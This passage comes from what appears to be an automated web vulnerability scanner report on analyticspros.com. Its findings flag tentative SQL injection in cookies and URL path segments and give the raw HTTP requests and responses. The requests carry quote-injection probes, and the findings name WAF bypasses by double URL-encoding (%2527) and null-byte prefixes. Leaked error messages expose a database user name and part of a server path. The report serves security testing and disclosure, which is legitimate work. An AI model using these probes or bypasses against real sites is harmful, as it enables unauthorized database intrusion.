Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:57 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527%2527
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.19. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937'; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:44:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937''; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:44:57 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:45:00 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:45:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.20. http://www.analyticspros.com/blog/55-googleanalytics/103-google-analytics-opt-out-feature.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/103-google-analytics-opt-out-feature.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics%2527/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:54:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics%2527%2527/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:54:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:54:30 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:54:30 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.21. http://www.analyticspros.com/blog/55-googleanalytics/103-google-analytics-opt-out-feature.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/103-google-analytics-opt-out-feature.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:41:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:41:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.22. http://www.analyticspros.com/blog/55-googleanalytics/106-google-analytics-health-check.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/106-google-analytics-health-check.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics'/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:03:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics''/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:03:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:03:31 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:03:31 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26170


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.23. http://www.analyticspros.com/blog/55-googleanalytics/106-google-analytics-health-check.html [apros2.0_tpl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/106-google-analytics-health-check.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:53:02 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:53:02 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26145


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.24. http://www.analyticspros.com/blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html?itemid=70#comment&1%00'=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:01:52 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html?itemid=70#comment&1%00''=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:01:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:01:54 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:01:54 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.25. http://www.analyticspros.com/blog/55-googleanalytics/113-domain-hostname-content-reports.html [ki_u cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/113-domain-hostname-content-reports.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/113-domain-hostname-content-reports.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:57:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/113-domain-hostname-content-reports.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:57:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:57:11 GMT; path=/
